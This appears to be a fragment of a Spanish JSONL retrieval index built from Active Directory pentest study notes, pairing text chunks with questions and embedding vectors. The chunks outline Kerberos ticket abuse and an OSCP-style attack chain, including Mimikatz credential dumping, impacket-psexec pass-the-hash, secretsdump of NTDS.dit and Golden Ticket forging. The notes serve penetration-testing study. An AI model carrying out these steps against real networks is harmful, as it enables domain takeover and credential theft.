0.04053, -0.01834, -0.06075, -0.06694, 0.04214, -0.08133, 0.02639, 0.01076, -0.01189, -0.0057, -0.02635, -0.00681, -0.01496, 0.01506, -0.07172]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Kerberos en 30 segundos\n\n```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ Usuario β”‚ ΒΏPwd? β”‚ KDC (Domain β”‚\n β”‚ (cliente)β”‚ ─────────────► β”‚ Controller) β”‚\n β””β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚ β”‚\n β”‚ ◄──── TGT (te identifica)β”‚\n β”‚ β”‚\n β”‚ TGT + \"quiero \\\\fileSrv\" β”‚\n β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Ίβ”‚\n β”‚ β”‚\n β”‚ ◄──── TGS (para fileSrv)β”‚\n β”‚ β”‚\n β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚\n └──────────►│ fileServerβ”‚ \"este TGS prueba que soy yo\"\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```\n\n- **TGT** = \"carnet maestro\" del KDC. Lo guarda el cliente.\n- **TGS** = \"ticket de un dΓ­a\" para hablar con un servicio concreto.\n- **Trucos**: si pillas un TGT/TGS vΓ‘lido lo puedes **reutilizar** (pass-the-ticket). Si pillas el hash de `krbtgt` (la cuenta que firma TODOS los TGT) puedes forjar **Golden Tickets** = ser cualquiera, para siempre.\n\n---", "indexar": "como es posible entrar en cualquier servidor con un ticket robado?", "v": [0.01447, 0.08075, -0.15461, -0.09076, -0.10681, -0.04417, 0.02114, 0.02768, 0.12485, -0.02477, -0.13302, -0.1285, 0.09643, 0.02945, 0.06126, 0.05055, 0.12973, -0.02173, 0.15891, 0.0096, -0.02335, 0.06062, 0.09303, 0.00043, 0.07476, -0.01984, 0.06156, 0.05194, -0.13906, -0.033, 0.00998, -0.1287, 0.02906, -0.03792, 0.00435, -0.12939, 0.13397, 0.18991, -0.01552, -0.03558, 0.12515, 0.00336, -0.12532, 0.04368, -0.01513, -0.12034, 0.01622, -0.00278, 0.02528, -0.06115, -0.00607, -0.11133, -0.13524, -0.05972, -0.008, -0.00664, 0.09503, -0.13491, 0.06312, -0.02609, -0.18826, -0.00064, -0.04179, 0.00242, -0.02826, 0.03504, 0.02061, -0.00088, 0.05231, -0.14492, -0.13206, -0.01191, -0.01216, 0.00691, 0.10206, 0.01537, -0.01866, -0.03757, 0.09077, 0.11658, 0.01258, 0.04504, -0.06859, 0.08056, -0.01538, -0.10061, 0.1027, -0.02236, 0.01577, 0.12981, 0.11542, 0.07325, -0.03907, 0.05859, -0.03147, -0.08345, 0.06795, -0.06861, -0.03893, -0.03708, -0.04428, 0.01279, -0.04051, 0.02718, -0.05281, 0.07031, 0.13925, -0.04446, 0.09538, -0.0237, -0.00409, 0.00083, -0.10545, -0.02117, -0.07612, -0.02005, 0.06082, 0.03553, 0.05278, 0.07491, -0.05527, -0.05183, 0.0419, -0.03646, 0.02888, -0.05874, 0.03595, 0.07391, 0.02486, -0.07962, -0.01994, 0.07331, -0.10644, 0.00759, -0.04797, 0.00924, 0.00156, -0.03435, -0.01708, 0.01344, 0.06213, 0.00999, -0.01152, -0.01675, 0.0891, -0.02211, 0.06526, -0.03779, -0.12403, -0.01187, -0.03327, -0.00767, -0.03686, 0.10249, -0.05945, 0.05887, 0.01838, -0.13199, -0.09832, 0.01215, 0.01597, 0.00683, 0.06746, 0.08341, -0.0039, -0.0183, -0.02851, -0.00169, 0.05478, 0.00804, -0.05028, 0.04288, 0.0479, 0.00161, 0.02203, -0.00462, -0.08924, -0.0826, 0.03986, -0.02773, -0.02663, -0.00063, -0.00705, 0.00928, -0.0359, -0.06222, 0.05093, -0.03167, -0.00963, -0.00803, 0.06329, -0.00991, -0.05687, 0.06744, -0.01557, -0.04614, -0.07709, 0.02022, 0.00531, -0.00459, -0.06081, -0.01074, -0.02567, -0.0253, 0.0132, -0.06167, -0.03845, -0.03295, 0.02008, 0.05779, -0.00322, -0.03607, 0.10681, -0.04704, -0.04012, 0.00938, 0.02447, -0.02143, -0.05388, -0.0241, 0.02082, 0.02642, 0.05744, -0.03844, 0.02176, -0.00185, -0.01146, 0.02515, 0.08997, -0.00544, -0.02122, 0.00653, -0.02812, -0.03913, 0.04734, -0.00243, 0.03366, -0.05718, -0.07575, -0.06317, -0.0215, 0.08482, -0.02475, -0.05812, -0.0374, -0.02828, -0.04857, 0.01055, 0.01389, -0.04782, 0.0311, -0.01104, 0.05084, -0.01438, 0.00586, -0.03763]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Kerberos en 30 segundos\n\n```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ Usuario β”‚ ΒΏPwd? β”‚ KDC (Domain β”‚\n β”‚ (cliente)β”‚ ─────────────► β”‚ Controller) β”‚\n β””β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚ β”‚\n β”‚ ◄──── TGT (te identifica)β”‚\n β”‚ β”‚\n β”‚ TGT + \"quiero \\\\fileSrv\" β”‚\n β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Ίβ”‚\n β”‚ β”‚\n β”‚ ◄──── TGS (para fileSrv)β”‚\n β”‚ β”‚\n β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚\n └──────────►│ fileServerβ”‚ \"este TGS prueba que soy yo\"\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```\n\n- **TGT** = \"carnet maestro\" del KDC. Lo guarda el cliente.\n- **TGS** = \"ticket de un dΓ­a\" para hablar con un servicio concreto.\n- **Trucos**: si pillas un TGT/TGS vΓ‘lido lo puedes **reutilizar** (pass-the-ticket). Si pillas el hash de `krbtgt` (la cuenta que firma TODOS los TGT) puedes forjar **Golden Tickets** = ser cualquiera, para siempre.\n\n---", "indexar": "cual es el riesgo de tener el hash del krbtgt?", "v": [0.00906, -0.21489, 0.05642, 0.06653, 0.14636, -0.12618, 0.01257, 0.16741, -0.07931, -0.01891, -0.08358, -0.02481, 0.02361, 0.02345, 0.11045, 0.07243, -0.17312, 0.13293, -0.06859, -0.0086, 0.04646, -0.17468, -0.00054, 0.16376, -0.05557, -0.08573, -0.09827, 0.10673, -0.23789, 0.02184, 0.02012, -0.05807, -0.03541, 0.06394, -0.05756, 0.12371, -0.01573, 0.17945, 0.01886, 0.05858, 0.03796, -0.08773, -0.07705, 0.0541, 0.06347, -0.10436, -0.13472, -0.01783, 0.03954, 0.00265, -0.03416, 0.04066, -0.13429, -0.079, 0.01624, 0.05446, 0.01104, -0.07725, -0.07642, -0.07225, -0.00233, 0.01557, -0.03267, -0.0884, -0.04453, -0.15625, -0.07231, 0.04868, -0.06097, -0.01666, 0.00395, 0.0248, -0.06321, 0.0175, 0.0415, 0.0419, -0.01305, 0.04087, 0.00453, -0.00557, 0.00755, -0.08279, 0.03983, -0.0069, -0.18188, -0.1765, 0.07713, -0.02758, 0.01175, -0.01569, 0.12862, 0.06412, 0.02699, 0.0516, -0.0571, -0.10287, 0.06282, 0.0492, -0.01538, 0.00362, -0.0169, 0.06257, -0.02916, 0.11661, -0.01815, -0.0268, 0.0442, 0.0026, 0.05417, -0.01781, -0.0164, 0.04723, -0.04706, -0.06482, -0.02938, 0.03053, -0.03961, -0.08551, 0.04863, -0.06936, -0.06439, -0.01506, 0.0269, -0.00719, 0.07917, -0.05006, -0.0346, 0.0424, 0.01521, 0.04949, -0.05718, 0.0112, -0.01917, -0.00169, -0.0373, 0.00268, 0.01121, 0.00041, -0.08176, -0.07878, 0.02504, 0.07853, 0.01, -0.10896, 0.0096, 0.02746, 0.00029, -0.04166, 0.01103, 0.03618, -0.08836, 0.07443, 0.01963, 0.02623, 0.03977, -0.02383, -0.04461, -0.0354, 0.00817, 0.03484, 0.04736, 0.00247, 0.05983, 0.06232, -0.00286, -0.01751, 0.04292, -0.02807, 0.06743, -0.0334, 0.04217, -0.02546, 0.01336, 0.02803, 0.0562, -0.00732, -0.03799, -0.01469, 0.00104, -0.04506, -0.03467, 0.01158, 0.00361, 0.02159, 0.05343, -0.01546, 0.06453, 0.02267, 0.04795, 0.04378, -0.04091, 0.01837, -0.11749, 0.03101, -0.00087, 0.00587, 0.05982, -0.05871, 0.07516, -0.02735, -0.04368, 0.00712, 0.00882, -0.08074, 0.04672, -0.02978, -0.02635, 0.01809, -0.0468, 0.02536, 0.07837, -0.02701, 0.09857, -0.03089, -0.04034, 0.02321, -0.01851, 0.01669, -0.009, 0.03634, -0.00412, 0.01472, 0.02991, -0.04355, -0.02024, -0.02027, 0.00253, -0.01262, 0.04699, 0.02289, -0.02629, 0.0252, -0.02602, 0.01061, 0.07676, 0.05225, 0.00153, -0.00895, 0.00717, -0.11475, 0.00383, 0.04625, -0.02374, -0.04351, 0.01786, -0.0373, -0.08346, 0.04898, 0.00093, -0.08068, -0.00788, -0.01046, 0.01296, -0.02456, 0.02493, -0.05841]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "## La cadena de ataque \"OSCP tΓ­pica\" con esto", "indexar": "QuΓ© programa me ayuda a montar una cadena de ataque tΓ­pica como en el OSCP?", "v": [-0.09639, 0.03296, -0.08022, -0.15151, -0.13397, -0.12417, 0.06873, 0.05783, -0.10782, -0.04982, 0.06195, -0.02075, -0.02169, -0.06467, 0.00241, -0.06381, 0.05883, 0.01652, 0.22398, -0.05803, -0.09295, -0.04541, -0.00719, -0.02277, 0.0251, 0.08716, 0.07843, 0.03786, -0.10976, -0.11227, 0.00536, 0.0454, 0.04628, 0.04297, 0.01549, -0.05913, -0.08771, -0.12231, 0.05891, 0.04218, -0.06887, -0.04796, -0.04472, 0.01157, 0.111, 0.0413, 0.0753, 0.0838, 0.00587, -0.04837, -0.02954, -0.04131, -0.14077, -0.03891, 0.01791, -0.06169, -0.00867, -0.06346, 0.01376, 0.01744, -0.00519, 0.07328, -0.02536, -0.12571, 0.07317, -0.03529, -0.0649, -0.00469, -0.13779, -0.09511, -0.02448, 0.0346, -0.0778, 0.04485, 0.02226, -0.03699, 0.08167, 0.0524, 0.2284, -0.02463, 0.04401, -0.02954, 0.10751, 0.09983, -0.05095, -0.06394, 0.07362, -0.03494, -0.09971, -0.07257, 0.1014, 0.01723, 0.03717, 0.04891, 0.0272, -0.11044, 0.06987, 0.00471, 0.05234, 0.01821, -0.04788, -0.02704, -0.09979, 0.11211, -0.00207, 0.02644, 0.04971, -0.05341, -0.03786, -0.00558, 0.0203, 0.0116, -0.05507, -0.03396, -0.13344, -0.0693, 0.00041, 0.00172, 0.01558, -0.00987, -0.13849, 0.15147, 0.00991, 0.06879, 0.0057, 0.01463, -0.0098, 0.08542, -0.04293, 0.08224, -0.09087, -0.02322, 0.02789, -0.07671, -0.04107, -0.04895, -0.01007, -0.09175, -0.06304, -0.02486, 0.0597, 0.02141, 0.00512, -0.02902, 0.03229, -0.02788, 0.05843, -0.13718, -0.07568, 0.08581, -0.01047, 0.12814, 0.0727, -0.02152, -0.08505, -0.05775, 0.02468, -0.02277, 0.01449, 0.14586, 0.06194, -0.06012, -0.03955, -0.00032, 0.00212, -0.03591, -0.00772, 0.02292, 0.09449, 0.04433, -0.031, 0.09117, 0.0393, -0.01551, 0.03106, -0.03597, -0.05186, -0.07537, 0.04147, 0.01047, -0.09947, -0.00698, 0.03037, 0.02898, 0.02215, -0.0426, 0.01909, 0.03928, 0.01105, 0.03247, -0.03073, -0.00242, -0.03663, -0.02058, -0.01148, -0.07164, -0.03498, 0.01607, 0.04512, 0.00286, -0.04268, -0.07229, -0.01357, -0.04676, 0.05104, 0.07354, -0.05972, 0.03336, 0.04138, 0.13489, 0.02114, -0.03409, 0.08256, 0.01312, -0.01845, 0.02367, 0.03637, 0.08436, -0.01374, 0.03716, 0.01722, -0.00018, 0.08094, 0.06795, -0.00963, -0.04761, 0.0522, 0.03456, -0.00463, 0.01468, 0.00473, -0.1061, 0.04554, -0.04654, 0.03516, -0.01651, -0.02252, -0.01583, -0.0317, -0.01344, -0.037, 0.03434, 0.00503, -0.03596, -0.00449, 0.00339, -0.07216, 0.01963, -0.01844, 0.00253, -0.01154, 0.05649, 0.03442, -0.09993, 0.02041, 0.01086]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "## La cadena de ataque \"OSCP tΓ­pica\" con esto", "indexar": "ΒΏCon quΓ© puedo simular un ataque de fuerza bruta contra una contraseΓ±a?", "v": [-0.03454, 0.06054, -0.17329, -0.05802, -0.08016, 0.01502, -0.01176, -0.01459, -0.0135, -0.06607, -0.05508, 0.01943, -0.01592, 0.08704, -0.01327, -0.08675, 0.03452, -0.02715, -0.02081, -0.06743, 0.00939, -0.18249, 0.10858, -0.0932, -0.04995, -0.01715, 0.0058, 0.15699, -0.07623, -0.20133, 0.02507, 0.03025, 0.19704, -0.02422, 0.04594, 0.11109, -0.06534, 0.10663, 0.19458, 0.16585, 0.0324, 0.05073, -0.13077, 0.0212, 0.00394, 0.02323, -0.03758, 0.00083, 0.02055, -0.00241, -0.14285, -0.04702, -0.09854, -0.10358, -0.06912, -0.16945, 0.09588, -0.10689, 0.02526, -0.00844, -0.07376, 0.03273, 0.02084, -0.01829, -0.05451, -0.05221, 0.00412, -0.01431, -0.04823, 0.05126, -0.10894, -0.06384, -0.09395, -0.00986, -0.02375, -0.01151, -0.01525, 0.07067, -0.01873, 0.02793, -0.08826, -0.00861, -0.10835, -0.01846, -0.09719, -0.0075, 0.06968, -0.05447, -0.00935, -0.07878, 0.05298, -0.04735, -0.01749, 0.03859, -0.04868, -0.04331, -0.00787, -0.0202, -0.02946, -0.08275, -0.06155, -0.06473, -0.08374, 0.0524, 0.07413, -0.00714, -0.05185, -0.02328, 0.01063, -0.05352, 0.00759, -0.07222, -0.15208, 0.00981, 0.02385, -0.0175, -0.12498, -0.10395, 0.06432, 0.01628, -0.06809, -0.02915, 0.00499, 0.06613, -0.03807, 0.0952, 0.00892, 0.0491, -0.06779, -0.08038, 0.00878, -0.00429, 0.02103, -0.03495, 0.02184, 0.01938, 0.01011, -0.15369, -0.0669, -0.05377, 0.04911, 0.06487, 0.03251, -0.09649, -0.00188, 0.04778, 0.01115, -0.02282, -0.1342, 0.05676, 0.02757, -0.02934, 0.06886, 0.09796, -0.07261, 0.01072, 0.03281, -0.09486, -0.0335, 0.09803, -0.0474, -0.0225, -0.10555, 0.01124, -0.03604, -0.04092, -0.05474, -0.06319, 0.01686, 0.03627, -0.00588, 0.04008, 0.05293, 0.0063, 0.03559, -0.03618, -0.01992, -0.0141, -0.01477, -0.04463, 0.00575, -0.0086, -0.03045, 0.00858, -0.02175, -0.05131, 0.06232, 0.0036, 0.0452, 0.02047, 0.01882, 0.0414, -0.01565, 0.05522, -0.01084, -0.05181, -0.05073, 0.00265, 0.01229, -0.01743, 0.02696, -0.08559, -0.01907, -0.03069, 0.09638, 0.07563, -0.05969, -0.00386, -0.03215, 0.01947, 0.04709, -0.02353, 0.07795, -0.05965, -0.05686, -0.06283, 0.01696, 0.04737, -0.00733, -0.0387, 0.02149, 0.08488, 0.01335, 0.0429, -0.03326, 0.00236, -0.00808, -0.03796, 0.03344, 0.04931, -0.02855, -0.03671, 0.01691, 0.00719, 0.04177, -0.00693, 0.0173, -0.01271, -0.11818, 0.01281, -0.00896, 0.05572, 0.00248, -0.11284, -0.063, -0.01102, -0.09251, 0.01493, -0.01099, -0.00669, -0.05569, 0.00433, 0.07439, -0.03518, 0.03578, -0.0118]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "## La cadena de ataque \"OSCP tΓ­pica\" con esto", "indexar": "Existe alguna herramienta para automatizar la fase inicial del pentesting?", "v": [-0.02509, 0.13184, -0.20787, -0.09211, 0.03136, -0.06765, -0.08208, -0.10579, -0.18847, 0.02516, -0.05333, 0.04135, -0.01792, 0.0737, 0.13495, 0.13818, -0.04311, -0.11541, 0.00859, -0.02392, -0.0768, -0.04428, -0.10201, -0.04452, -0.14468, 0.02857, 0.03794, -0.00467, -0.24648, 0.05972, -0.02366, 0.03089, 0.01559, -0.03846, -0.02884, -0.20163, 0.04791, 0.08356, 0.02624, 0.08398, -0.0013, 0.06031, -0.03463, 0.09514, 0.07115, 0.06229, -0.06552, 0.09333, 0.09969, 0.07975, 0.04839, -0.14196, -0.0674, -0.01032, 0.00101, -0.10803, 0.23734, -0.12362, 0.08494, -0.1924, 0.02188, 0.06241, -0.09391, -0.06739, -0.01462, 0.0423, 0.07902, -0.07519, 0.02529, 0.14117, 0.03438, 0.06513, 0.04199, 0.03217, 0.00027, 0.03298, -0.01392, 0.0785, 0.05313, -0.01379, 0.01106, 0.05293, -0.03696, 0.05244, 0.00065, -0.13541, 0.01038, -0.05916, 0.02316, -0.0832, -0.09012, 0.0197, 0.03649, 0.04712, 0.03314, -0.02832, -0.00625, -0.05335, -0.03312, -0.03374, 0.11001, 0.00134, -0.0815, 0.10041, -0.02442, -0.04446, -0.01581, -0.01993, -0.00531, -0.04719, 0.04297, 0.09035, 0.00628, -0.02157, -0.05923, 0.04854, 0.00783, -0.06541, -0.02314, -0.14184, 0.09187, 0.03, -0.03731, -0.01127, 0.01189, -0.03599, -0.04072, 0.09269, -0.01118, -0.09192, 0.05829, -0.0072, -0.09336, -0.02971, -0.0227, 0.00684, -0.01419, -0.0606, -0.08211, -0.06303, -0.05284, 0.07239, -0.03905, -0.11926, 0.04075, -0.03476, 0.02418, -0.07524, 0.02518, 0.04179, -0.02729, -0.02401, 0.0168, -0.014, -0.0139, 0.03025, -0.01724, 0.05626, -0.0066, 0.00892, -0.02022, -0.07018, 0.01458, -0.06141, -0.00941, -0.03302, 0.03332, 0.02074, 0.03842, 0.0199, 0.07734, -0.00411, 0.05624, 0.02048, -0.01086, 0.01386, -0.07383, 0.0172, 0.01591, -0.03263, 0.04685, -0.03702, 0.01325, -0.05272, -0.01198, -0.03864, 0.03865, -0.05344, -0.01611, 0.06557, -0.04162, -0.0304, -0.0326, -0.09049, 0.03907, -0.01211, 0.00997, -0.05675, 0.03191, -0.0247, -0.06699, 0.01352, -0.01352, -0.06218, -0.01029, 0.07646, 0.02641, -0.03618, 0.00449, 0.02373, 0.04804, -0.01937, -0.00312, 0.00751, 0.00669, -0.02951, -0.03402, -0.01385, 0.021, -0.01741, 0.03373, 0.01927, 0.05141, 0.04962, -0.01054, 0.04428, 0.05421, 0.04034, -0.00031, -0.02209, -0.00345, -0.01055, 0.00715, 0.00459, -0.00322, -0.06047, 0.08395, -0.05602, -0.01146, -0.00935, 0.04099, 0.01285, 0.02817, -0.01008, -0.05198, -0.02358, -0.00956, -0.03174, -0.02754, -0.04203, 0.01812, 0.00079, 0.00721, -0.00906, -0.00146, -0.01237]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ β”‚\n β”‚ 1) RCE inicial en una web ───────► reverse shell PowerShell β”‚\n β”‚ (sqli, file upload, etc.) en mΓ‘quina USUARIO1 β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 2) WinPEAS desde tu carpeta ──► subes y ejecutas β”‚\n β”‚ enumera permisos, AlwaysInstallElevated, etc. β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 3) Local privesc ──► SYSTEM en USUARIO1 β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 4) Mimikatz ──► sekurlsa::logonpasswords β”‚\n β”‚ β†’ hash NTLM de un usuario de dominio (DOMAIN\\juan) β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 5) BloodHound ──► \"ΒΏjuan es admin en algΓΊn sitio?\" β”‚\n β”‚ \"ΒΏjuan puede llegar a Domain Admin por algΓΊn camino?\" β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 6) Impacket-psexec con el hash de juan ──► shell en SERVER2 β”‚\n β”‚ impacket-psexec -hashes :HASH 'juan@server2.local' β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 7) Si server2 = Domain Controller: β”‚\n β”‚ impacket-secretsdump ──► vuelcas TODA la BD del dominio β”‚\n β”‚ (NTDS.dit, krbtgt, etc.) β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 8) Con hash de krbtgt: β”‚\n β”‚ impacket-ticketer ──► Golden Ticket β†’ eres dios β”‚\n β”‚ β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "quΓ© herramienta puedo usar para enumerar permisos de Windows desde mi propia carpeta?", "v": [0.03962, 0.07985, -0.15256, -0.13302, 0.0648, -0.08271, -0.0411, -0.04733, -0.12313, -0.20637, -0.10248, -0.00481, -0.01008, -0.08037, 0.006, 0.02445, 0.0893, -0.07389, 0.03222, -0.01189, 0.01342, -0.03743, -0.0803, 0.02845, -0.17185, 0.01617, 0.15335, -0.03819, -0.16942, -0.00479, -0.00929, 0.13274, 0.05387, -0.08964, -0.05107, -0.01879, -0.05461, 0.02271, -0.0024, -0.00303, 0.11251, 0.15685, -0.06615, 0.10146, 0.03048, -0.01034, -0.00796, -0.05255, -0.09803, 0.00172, -0.10687, -0.15571, -0.07574, -0.07824, 0.04789, -0.14809, 0.20746, -0.11849, 0.03685, 0.00357, -0.06187, 0.00219, -0.07806, 0.07731, -0.02985, -0.04062, 0.07101, -0.0691, -0.05957, 0.14494, -0.10165, 0.03649, 0.09605, -0.0105, 0.04325, -0.00311, -0.11093, -0.07994, 0.07929, -0.02002, 0.0579, -0.01533, -0.05706, -0.06877, -0.02005, -0.15243, 0.0412, -0.03581, 0.03064, -0.08164, -0.00234, -0.00225, -0.0949, 0.01933, 0.03115, -0.06241, -0.0085, 0.01429, -0.00562, 0.02838, 0.04917, -0.07278, -0.08852, 0.12608, -0.03958, 0.03853, -0.01082, -0.08859, -0.10048, -0.04376, 0.0635, 0.04638, -0.04388, 0.04043, -0.05772, 0.01902, -0.04733, -0.10056, -0.05277, -0.016, 0.00696, -0.01446, -0.06084, 0.04037, 0.06108, -0.05353, -0.05205, 0.16798, -0.09915, -0.04585, 0.00123, -0.00183, -0.05437, -0.05019, -0.06541, 0.06719, -0.06459, -0.09225, 0.00974, -0.04887, 0.03743, 0.06005, 0.00633, -0.03878, 0.0138, 0.05478, 0.00388, -0.01032, -0.03354, -0.08288, 0.07684, -0.05167, -0.00919, 0.02562, -0.00846, 0.05477, 0.00501, 0.03255, -0.03871, 0.00407, -0.02782, -0.05997, 0.00344, 0.04625, 0.07437, -0.02985, 0.00353, 0.00922, 0.02479, 0.08248, -0.01388, 0.04468, 0.00768, -0.03922, 0.01908, -0.05794, 0.01031, -0.0026, -0.03949, -0.01667, -0.06083, 0.00482, -0.02815, -0.05626, -0.00952, -0.02238, 0.02626, 0.00728, 0.01214, 0.03146, -0.06575, 0.07844, 0.07111, -0.0633, -0.0206, -0.01991, -0.02066, -0.05247, 0.01576, -0.02668, -0.04184, -0.00098, -0.04492, -0.06117, 0.12718, 0.01117, -0.06402, 0.0355, 0.02462, 0.02946, 0.02017, -0.02798, 0.03776, -0.02412, 0.00179, -0.02627, 0.02365, 0.02982, -0.01141, -0.0611, 0.09684, 0.03016, 0.05153, 0.00898, 0.01535, 0.02046, -0.01568, -0.00576, 0.01853, 0.02354, 0.03805, 0.01829, -0.00439, -0.05999, 0.01223, -0.04255, 0.03752, -0.04128, -0.03162, 0.00011, -0.01966, 0.07193, -0.01355, -0.06247, -0.04527, -0.03619, -0.01883, -0.00318, -0.04106, -0.09219, 0.01433, -0.00732, 0.05039, -0.05225, -0.01142, 0.01231]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ β”‚\n β”‚ 1) RCE inicial en una web ───────► reverse shell PowerShell β”‚\n β”‚ (sqli, file upload, etc.) en mΓ‘quina USUARIO1 β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 2) WinPEAS desde tu carpeta ──► subes y ejecutas β”‚\n β”‚ enumera permisos, AlwaysInstallElevated, etc. β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 3) Local privesc ──► SYSTEM en USUARIO1 β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 4) Mimikatz ──► sekurlsa::logonpasswords β”‚\n β”‚ β†’ hash NTLM de un usuario de dominio (DOMAIN\\juan) β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 5) BloodHound ──► \"ΒΏjuan es admin en algΓΊn sitio?\" β”‚\n β”‚ \"ΒΏjuan puede llegar a Domain Admin por algΓΊn camino?\" β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 6) Impacket-psexec con el hash de juan ──► shell en SERVER2 β”‚\n β”‚ impacket-psexec -hashes :HASH 'juan@server2.local' β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 7) Si server2 = Domain Controller: β”‚\n β”‚ impacket-secretsdump ──► vuelcas TODA la BD del dominio β”‚\n β”‚ (NTDS.dit, krbtgt, etc.) β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 8) Con hash de krbtgt: β”‚\n β”‚ impacket-ticketer ──► Golden Ticket β†’ eres dios β”‚\n β”‚ β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "con quΓ© programa local puedo pasar de privilegios de usuario a SYSTEM en una mΓ‘quina Windows?", "v": [-0.05366, -0.00986, -0.12494, -0.23498, -0.0006, -0.08546, -0.09904, -0.15624, -0.08938, -0.11759, -0.04507, 0.03781, -0.01625, -0.06277, -0.02061, 0.05293, 0.0335, -0.06835, -0.01007, 0.09762, 0.00683, -0.05377, -0.06301, 0.0354, 0.03703, 0.06811, 0.04199, 